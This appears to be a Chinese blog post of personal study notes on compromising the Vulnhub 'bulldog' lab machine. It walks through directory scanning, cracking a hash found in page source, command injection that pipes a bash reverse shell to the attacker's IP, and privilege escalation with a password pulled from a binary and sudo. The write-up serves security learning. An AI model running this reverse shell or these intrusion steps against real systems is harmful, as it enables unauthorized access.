渗透测试 bulldog 学习过程笔记

最新推荐文章于 2024-07-23 09:33:41 发布
最新推荐文章于 2024-07-23 09:33:41 发布
阅读量71 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52630049/article/details/130621947
版权

kali ip:192.168.23.131(xshell 7连接)

改为桥接模式

 

(图下是一个开启sshd的过程)

bulldog ip:192.168.23.88 (这里借用了老师搭建的靶机)

网站页面如下,空空如也,没有登录入口,没有能提交表单的入口,无法定位数据库的位置(?)

步骤如下:

kali使用dirb命令扫描靶机网址下的子域名:

得到目录:

访问admin登录,此时查看/dev/可以访问,但/dev/shell、需要登录后访问

f12查看源代码,发现如下信息

估计就是登录需要的用户名和密码了,解密nick后的哈希

网址:MD5免费在线解密破解_MD5在线加密-SOMD5

登录,虽无root权限,但此时可以查看/dev/shell/了 

回到kali开一个监听

 

(附上shell反弹命令)

[~]#棱角 ::Edge.Forum* (ywhack.com)

echo 是可以使用的,这里利用 echo 构建一个反弹shell的命令,然后用管道符交给 bash 执行

(其实这里如果用联合查询注入的话,其实&&是被过滤掉了的)

echo 'bash -i >& /dev/tcp/192.168.23.131/4444 0>&1' | bash

(中间是kali的ip)

run,kali接收到反弹shell

提权,倒数第四行发现bulldogadmin用户

cd ..                                 切换到home下

ls                                     显示目录下的内容

cd bulldogadmin             切换到子目录  

ls -al                                显示隐藏目录

cd .hiddenadmindirectory       转到此目录下

ls -al                                        查看隐藏目录

strings customPermissionApp         提取和显示非文本文件中的文本字符串

得到密码串SUPERultimatePASSWORDyouCANTget

 

(最后的part没搞出来,借用了(2条消息) 靶机渗透【bulldog】_bulldog靶场_‍‍‪‍pinkward的博客-CSDN博客

的几张图片

错误:

 Python 调用本地的 shell 实现,输入 python -c ‘import pty; pty.spawn("/bin/bash")’

sudo su - 进入登录模式,然后输入之前获得的密码串

提权成功 

 

 

 

 

 

 

 

Reji_热寂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 七十五.Vulnhub靶机渗透bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
渗透靶机之BULLDOG
qq_43235703的博客
02-02 1130
靶机渗透BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 980
一、实验环境 攻击机(Kali):192.168.247.160 靶机(bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 247
这个靶机难度较为简单,可以简单练手
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1674
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
[渗透测试靶机11] vulnhub靶场 BULLDOG_ 2
weixin_47112073的博客
11-14 215
这个靶机的整体难度中等以上,在于代码审计 反弹shell等
vulnhub靶机bulldog渗透笔记
liver100day的博客
05-18 268
bulldog靶机渗透笔记 靶机环境搭建 攻击渗透机:kali IP地址:192.168.75.128 靶机:bulldog ip地址:未知 靶机下载链接:https://download.vulnhub.com/bulldog/bulldog.ova 在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式 渗透过程 1.信息收集 netdiscover 来确认目标靶机IP地址,会扫描出同网段中除本机外的其他存活主机 ...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7424
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
CTF渗透训练(笔记
weixin_57536426的博客
12-26 1044
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。...如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 … 如果您不打算运行rake doc:app请随意使用其他标记语言。
购物车管理测试用例.doc
10-10
本测试用例包括四个主要功能测试用例:购物车管理功能测试、订购过程功能测试、浏览宠物功能测试和交付定货功能测试。 一、购物车管理功能测试(TC-Order-01) 购物车管理功能测试的目的是验证Pet shop购物车功能...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
客户端与服务器通讯详解(5):安全威胁与应对策略
最新发布
贝格前端工场的博客
07-23 279
在进行客户端与服务器通讯的时候,要时刻防范安全威胁,后端有一句名言“永远不要相信用户在前端的输入”,就是说客户端和服务器之间通讯,必须有严密的规则。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 508
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 643
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1117
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值